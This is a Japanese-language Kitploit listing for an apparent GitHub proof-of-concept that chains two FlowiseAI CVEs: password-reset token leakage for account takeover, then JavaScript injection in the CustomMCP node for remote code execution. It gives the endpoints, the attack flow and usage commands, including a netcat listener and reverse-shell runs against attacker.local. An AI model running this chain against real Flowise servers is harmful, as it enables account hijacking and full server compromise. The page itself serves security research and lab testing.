Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Flowise-CVE-2025-58434-Chain-59528 — FlowiseAI CVE-2025-58434 および CVE-2025-59528 のエクスプロイト PoC。リセットトークンの漏洩による未認証の ATO、続いて認証済み RCE を実証します。再現可能な Docker ラボ環境を含みます。 | Kitploit
ツール/GitHubGitHub/0xdaeras/flowise-cve-2025-58434-chain-59528
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証学習と教育ラボと実践
GitHub0xdaeras/flowise-cve-2025-58434-chain-59528

Flowise-CVE-2025-58434-Chain-59528

FlowiseAI CVE-2025-58434 および CVE-2025-59528 のエクスプロイト PoC。リセットトークンの漏洩による未認証の ATO、続いて認証済み RCE を実証します。再現可能な Docker ラボ環境を含みます。

リポジトリを見る
164ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

FlowiseAI CVE チェーン - ATO (CVE-2025-58434) および RCE (CVE-2025-59528)

CVE-2025-58434 CVSS-1 CVE-2025-59528 CVSS-2 Python License

⚠️ 教育および許可されたセキュリティ研究のみを目的としています。 このツールを、自分が所有していない、または書面によるテスト許可がないシステムに対して実行することは違法です。


目次

このリポジトリには、2つのFlowise脆弱性を連鎖させるPythonの概念実証コードが含まれています:

  • CVE-2025-58434 — パスワードリセットトークンの露出によるアカウント乗っ取り
  • CVE-2025-59528 — CustomMCPノードでの安全でないJavaScript評価によるリモートコード実行

Flowiseは、LLMアプリケーションやAIエージェントワークフローを構築するためのドラッグ&ドロッププラットフォームです。CVE-2025-59528はFlowise 3.0.5に影響し、3.0.6で修正されました。この問題は、CustomMCPノード内でのmcpServerConfigの安全でない処理に起因します。CVE-2025-58434はパスワードリセットトークンの露出に関連し、これもFlowise 3.0.6で対処されました。

このツールは以下をサポートします:

  • 脆弱性チェック
  • アカウント乗っ取りフロー
  • ログインとクッキー取得
  • 認証済みRCE
  • フルチェーンモード:ATO → ログイン → RCE

脆弱性の詳細

CVE-2025-58434 — アカウント乗っ取り

  • CVE ID: CVE-2025-58434
  • CVSS v3.1 スコア: 9.8(クリティカル)
  • 脆弱性タイプ: アカウント乗っ取り / 認証バイパス
  • 影響を受ける製品: Flowise
  • テスト済みの影響を受けるバージョン: Flowise 3.0.5
  • 修正バージョン: Flowise 3.0.6
  • 認証の必要性: なし
  • 影響: パスワードリセットトークンの開示、アカウント乗っ取り

脆弱なパスワードリセットフローは、一時的なパスワードリセットトークンを含む機密ユーザーデータをAPIレスポンスで露出します。有効なユーザーのメールアドレスを知る攻撃者は、パスワードリセットを要求し、レスポンスから一時トークンを取得し、それを使用してアカウントの新しいパスワードを設定できます。

この脆弱な動作は、同じAPIサーフェスを公開するFlowiseクラウドおよびセルフホスト/ローカルデプロイメントに影響します。修正方法は、パスワードリセットトークンや機密のアカウントリセットデータをAPIレスポンスで直接返さないことです。

CVE-2025-59528 — リモートコード実行

  • CVE ID: CVE-2025-59528
  • CVSS v3.1 スコア: 10.0(クリティカル)
  • 脆弱性タイプ: JavaScriptコードインジェクション / リモートコード実行
  • 影響を受ける製品: Flowise
  • テスト済みの影響を受けるバージョン: Flowise 3.0.5
  • 修正バージョン: Flowise 3.0.6
  • 認証の必要性: あり
  • 影響: Node.jsランタイム内での任意のJavaScript実行、Flowiseをホストするサーバー上でのRCE

この脆弱性はFlowiseのCustomMCPノードに存在します。mcpServerConfigパラメータはMCPサーバー設定プロセスの一部として解析され、セキュリティ検証なしでJavaScriptコードとして評価されます。これにより、認証された攻撃者が任意のJavaScriptコードを注入でき、FlowiseサーバーのNode.js環境で実行されます。convertToValidJSONString関数では、ユーザー入力がFunctionコンストラクタに渡され、入力が完全なNode.js権限を持つJavaScriptコードとして評価され、child_processなどのモジュールにアクセスしてシステムコマンドを実行できます。

このPoCで使用される脆弱なエンドポイントは次のとおりです:

POST /api/v1/node-load-method/customMCP

JSONボディのmcpServerConfigフィールドにjsペイロードを指定します。例:

{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "..."
  }
}

脆弱なコードはCustomMCP.tsファイルにあり、CVEのGitHubメンテナーアドバイザリで参照されています。


攻撃フロー

攻撃者                                   Flowise
   │                                          │
   │  [CVE-2025-58434]                       │
   │  POST /api/v1/account/forgot-password   │
   │  { email }                              │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  ユーザーオブジェクト + tempToken        │
   │                                          │
   │  POST /api/v1/account/reset-password     │
   │  { email, tempToken, newPassword }       │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  パスワード変更                          │
   │                                          │
   │  POST /api/v1/auth/login                 │
   │  { email, newPassword }                  │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  token / refreshToken / connect.sid      │
   │                                          │
   │  [CVE-2025-59528]                       │
   │  POST /api/v1/node-load-method/customMCP │
   │  mcpServerConfig=<細工された設定>         │
   │─────────────────────────────────────────►│
   │                              Node.jsでJSが評価される
   │                              コマンドが実行される
   │◄─────────────────────────────────────────│
   │  コマンド出力またはペイロードが発火      │
   │                                          │
   ✓  アカウント乗っ取り + 認証済みRCE

リポジトリ構造:

Repository Structure
CVE-2025-58434-CVE-2025-59528/
├── exploit.py
├── README.md
├── requirements.txt
├── docker-compose.yml
└── logs/

インストール

ツール

git clone https://github.com/0xDaeras/CVE-2025-58434-CVE-2025-59528-POC.git
cd CVE-2025-58434-CVE-2025-59528-POC
pip install -r requirements.txt

Docker Lab

git clone https://github.com/0xDaeras/CVE-2024-51482-POC.git
cd CVE-2024-51482-POC
cp .env.example .env  # 環境変数を設定
docker-compose up -d

使用法

デフォルトの動作

引数なしで実行すると、ツールは完全な攻撃チェーンを実行し、ターゲットの脆弱性を確認し、指定されたメールアドレスのアカウント乗っ取りを実行し、ログインしてクッキーを取得し、リバースシェルペイロードでRCE脆弱性を悪用します。フルチェーンモードでツールを実行する前に、専用のリスナー(例:nc -lvnp 9889)を実行してください。

python3 exploit.py --target http://localhost:3000 --email [email protected] --lhost attacker.local --lport 9889

ヘルプ画面

python3 exploit.py -h

モード

check-mode

ターゲットがCVE-2025-58434およびCVE-2025-59528に対して脆弱かどうかを判断するバージョンチェックを実行します。ターゲットのAPIにリクエストを送信し、レスポンスを分析してFlowiseのバージョンと脆弱性ステータスを特定します。

python3 exploit.py --target http://localhost:3000 check

ato-mode

CVE-2025-58434のアカウント乗っ取りプロセスを実行します。指定されたメールアドレスに対してパスワードリセットリクエストを送信し、レスポンスから一時トークンを取得し、そのトークンを使用してアカウントの新しいパスワード(デフォルト: "Password123!")を設定します。

python3 exploit.py --target http://localhost:3000 --email [email protected] ato-mode

login-mode

指定されたメールアドレスとパスワード(デフォルト: "Password123!")を使用してターゲットにログインします。成功すると、認証クッキー(例:connect.sid)を取得して表示し、認証済みリクエストに使用します。

python3 exploit.py --target http://localhost:3000 --email [email protected] --password Password123! login-mode

rce-mode

RCE脆弱性(CVE-2025-59528)を悪用するため、細工されたmcpServerConfigペイロードを脆弱なエンドポイントに送信します。ペイロードは、指定されたLHOSTおよびLPORTで攻撃者のマシンに接続を返すリバースシェルコマンドを実行するように設計されています。トークンが指定されていない場合は、自動的にログインを試みて有効なトークンを取得します。LHOST/LPORTが指定されていない場合は、デフォルトでレスポンスに出力を返す単純なidコマンドペイロードを使用します。フルチェーンモードでツールを実行する前に、専用のリスナー(例:nc -lvnp 9889)を実行してください。

python3 exploit.py --target http://localhost:3000 --email [email protected] --password Password123! --lhost attacker.local --lport 9889 rce-mode

full-chain-mode

デフォルトモード。 攻撃チェーン全体を順次実行します:脆弱性の確認、アカウント乗っ取りの実行、ログインしてクッキーを取得、リバースシェルペイロードでRCE脆弱性を悪用します。フルチェーンモードでツールを実行する前に、専用のリスナー(例:nc -lvnp 9889)を実行してください。

python3 exploit.py --target http://localhost:3000 --email [email protected] --lhost attacker.local --lport 9889 full-chain-mode

フラグリファレンス

ターゲットと認証

フラグ説明例
-t, --targetターゲットのベースURL-t http://localhost:3000
-e, --emailターゲットアカウントのメール-e [email protected]
--passwordログイン/RCEモード用の既知のパスワード--password Password123!
--token既存のセッショントークン、ログインをスキップ--token eyJ...
--new-passwordATO中に設定するパスワード--new-password Password123!

エクスプロイトモード

モード説明
checkターゲットが脆弱かどうかを確認
ato-modeアカウント乗っ取りフローのみ実行
login-modeログインしてセッションクッキーを取得
rce-modeRCEフローのみ実行
full-modeATO、ログイン、RCEを連鎖

RCEオプション

フラグ説明例
-c, --command実行するカスタムコマンド-c 'id'
--lhostリバースシェル用のリスナーホスト--lhost 10.10.14.3
--lportリバースシェル用のリスナーポート--lport 4444

安全性と出力

ツールをダウンロード